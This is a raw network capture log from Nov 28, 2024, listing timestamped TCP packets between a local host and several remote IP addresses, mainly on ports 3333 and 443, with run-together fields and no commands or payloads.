                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662444115 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662538052 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662548065 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662561893 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662571907 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662586927 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662610054 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662647009 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662647009 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.662717104 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.711158037 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.760826111 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.767431974 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.767438889 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782337904 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782418966 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782428026 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782444000 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782486916 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782557011 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782567024 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782605886 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782622099 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782655001 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782664061 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782716036 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782828093 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782854080 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782883883 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782916069 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782972097 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.782982111 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.783008099 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.783015966 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.783026934 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.783065081 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.794853926 CET4434982123.209.72.28192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.830980062 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.834434032 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.834604979 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.834619045 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.838944912 CET49821443192.168.2.623.209.72.28
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.840135098 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.840147018 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.840715885 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.840720892 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.840905905 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.840935946 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.843010902 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.843036890 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.854671955 CET49821443192.168.2.623.209.72.28
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.854691029 CET4434982123.209.72.28192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.855300903 CET4434982123.209.72.28192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866413116 CET49821443192.168.2.623.209.72.28
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866430998 CET49821443192.168.2.623.209.72.28
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866487026 CET49822443192.168.2.623.209.72.28
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866533995 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866580963 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866607904 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866641998 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866652012 CET49820443192.168.2.623.200.0.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866677046 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866704941 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866719007 CET4434982023.200.0.6192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866827011 CET49813443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866837978 CET49820443192.168.2.623.200.0.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866897106 CET44349813162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866916895 CET49812443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866965055 CET49813443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866995096 CET44349812162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.867032051 CET49814443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.867077112 CET49815443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.867110968 CET44349814162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.867145061 CET44349815162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.867166042 CET44349812162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.867193937 CET49812443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.867194891 CET49815443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.867193937 CET49814443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.867233992 CET49812443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.867650986 CET49810443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.867719889 CET44349810172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.867871046 CET44349810172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.868098974 CET49810443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.868098974 CET49810443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.887530088 CET4434982223.209.72.28192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.887635946 CET4434982223.209.72.28192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.888777971 CET49822443192.168.2.623.209.72.28
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.888802052 CET49822443192.168.2.623.209.72.28
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.902548075 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.902630091 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.902820110 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.902857065 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.902934074 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903023005 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903099060 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903145075 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903156042 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903285027 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903335094 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903426886 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903436899 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903502941 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903544903 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903598070 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903691053 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903701067 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903711081 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903770924 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903781891 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903832912 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903842926 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903888941 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903919935 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.903954029 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.022875071 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.022947073 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.023072958 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.023119926 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.023365974 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.023370981 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.023402929 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.023407936 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.023448944 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.023497105 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.023535967 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.023726940 CET33334971545.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.023787022 CET497153333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.094873905 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.108699083 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.155337095 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.212321043 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.212389946 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.215008020 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.215013981 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.215533018 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.217704058 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.217713118 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.217864990 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.219456911 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.219479084 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.432742119 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.435635090 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.483338118 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.553323984 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.557168007 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.557220936 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.557230949 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.560269117 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.560282946 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.560508966 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.560636044 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.560662031 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.562321901 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.603331089 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.759660959 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.763459921 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:37.763485909 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.002738953 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.005831957 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.005863905 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.045547962 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.088938951 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.088948965 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.091814995 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.091826916 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.162556887 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.165211916 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.165227890 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.165359974 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.165364981 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.203716040 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.205938101 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.205951929 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.363841057 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.366658926 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.366678953 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.564793110 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.567533016 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.567548037 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.615804911 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.667085886 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.667100906 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.669831038 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.669840097 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.730492115 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.733059883 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.733074903 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.733155012 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.733160019 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.765919924 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.768477917 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.811337948 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.931704044 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.934439898 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:38.934462070 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.132951021 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.135593891 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.135613918 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.174262047 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.229583979 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.229605913 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.232645035 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.279326916 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.291069984 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.294178963 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.294200897 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.294290066 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.294294119 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.333899975 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.336780071 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.336821079 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.492373943 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.496273041 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.496313095 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.693526030 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.696033955 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.696063042 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.741930962 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.792068005 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.792078972 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.796066999 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.796111107 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.859249115 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.861927986 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.861962080 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.862039089 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.862061024 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.894596100 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.897134066 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:39.943335056 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.060543060 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.063500881 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.063532114 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.266539097 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.269299030 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.269324064 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.302129030 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.302191973 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.305021048 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.347340107 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.419265032 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.421937943 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.421960115 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.424057007 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.463124037 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.465167046 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.507324934 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.620482922 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.623374939 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.623404026 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.821535110 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.825293064 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.825364113 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.864392996 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.917084932 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.917104959 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.920079947 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:40.920119047 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:41.022814035 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:41.025634050 CET49732443192.168.2.613.107.246.63
